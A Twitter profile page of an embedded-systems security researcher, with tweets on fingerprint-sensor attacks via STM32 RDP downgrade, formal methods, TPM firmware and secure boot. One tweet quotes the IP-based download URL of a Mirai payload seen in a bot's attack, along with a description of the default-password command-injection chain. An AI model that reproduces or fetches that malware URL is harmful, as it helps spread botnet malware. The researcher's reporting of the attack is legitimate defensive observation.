|
Jeremy Boone
@
uffeux
Kitchener, ON
|
|
Embedded systems bug hunter @ NCC Group
|
|
|
1.872
Tweetovi
|
413
Pratim
|
612
Osobe koje vas prate
|
| Tweetovi |
|
Jeremy Boone
@uffeux
|
24 h |
|
Yeah. Sorry for confusion. If the electronics are exposed on the outside of the door, it may be possible to tamper with them after opening the plastics. But it'd be time consuming and you're better off just kicking it in or picking the lock.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
24 h |
|
Yeah for a door lock the threat model is different than, say, a mobile device that has a fingerprint sensor. You don't "lose" your door lock.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
4. velj |
|
Match-on-host is possibly slightly better, assuming the host can authenticate the STM32 to prove it is legitimate, and that the bus is encrypted+MAC'd. Still, any cryptographic identities or secrets may be extracted with an RDP downgrade.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
4. velj |
|
STM32 is a bad choice for match-on-chip implementations. The RDP downgrade attacks make it possible to tamper with the enrolled fingerprint template, or replace the firmware with a variant that accepts all fingerprints.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
29. sij |
|
It tried to use a default password in an http basic auth header in order to issue a request that executed a shell command that downloaded, and executed the above payload.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
29. sij |
|
Stood up a webserver for literally 30 seconds to mess around with something and got pinged by a bot trying to download this Mirai payload: http://82.223.101.182/.t/80/arm7
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
26. sij |
|
if you assume all regs are potentially malicious, wouldn't that produce a large number of FPs?
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
26. sij |
|
Hmmm... well thats like comparing apples and orange. SiFive has the advantage of having very little legacy complexity. I guess we can agree on that :)
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
26. sij |
|
I guess my point is: ioread(0x<reg>); <-- how can a FM tool know whether the data read from any reg is attacker controlled?
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
26. sij |
|
... and this only refers to input verification. There are other classes of bugs that many formal methods would struggle with. Ex: confused deputy problems require insight into the responsibilities of the deputy, which is something that may be encoded in hardware not software.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
26. sij |
|
The problem is that an FM tool can't divine the purpose of 10k's of peripheral regs, and how those regs are used to xfer data between sw and hw IPs, and whether any of that data can be trusted. This is where humans must train the tools.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
26. sij |
|
Also, i would be surprised if any large company did not already use SAST products that support custom modeling (coverity, klocwork, fortify). I think there's room for both. Use SAST for low hanging fruit, use skilled ppl to find new classes of vulns, then automate their detection
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
1. sij |
|
What do you mean: other examples of bugs related to usb control transfers, or different bootrom vuln classes? There are many examples of both.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
26. pro |
|
Like most peripherals in an embedded system, the chipset vendor develops/signs the firmware. The OEM merely distributes the firmware update package. Many TPM vendors base their code on this reference implementation: github.com/microsoft/ms-t…
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
22. pro |
|
Too expensive to buy a car for research purposes. Therefore much of the security work is done by contract, e.g. consulting. There are lots of automotive security experts who own cars every day, but can't publish because it's paid work for a client.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
22. pro |
|
I would argue that if BL2 is not authenticated then the device doesn't truly implement secure boot.
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
7. pro |
|
Nice. Its certainly non-trivial to interpose the bus. Any plans on releasing the tooling?
|
||
|
|
||
| Jeremy Boone proslijedio/la je tweet | ||
|
Ella Dawson
@brosandprose
|
6. pro |
|
Here's some of the best advice I got when I became a manager last year! It's simple, but considering most people receive no management training whatsoever these days, it's better than nothing. Thread!
|
||
|
|
||
|
Jeremy Boone
@uffeux
|
6. pro |
|
Awesome vulnerability and research.
|
||
|
|
||
| Jeremy Boone proslijedio/la je tweet | ||
|
Yaah 🦀 ☕
@yaahc_
|
27. stu |
|
GNU project code of conducts be like pic.twitter.com/on4W3QzVxC
|
||
|
|
||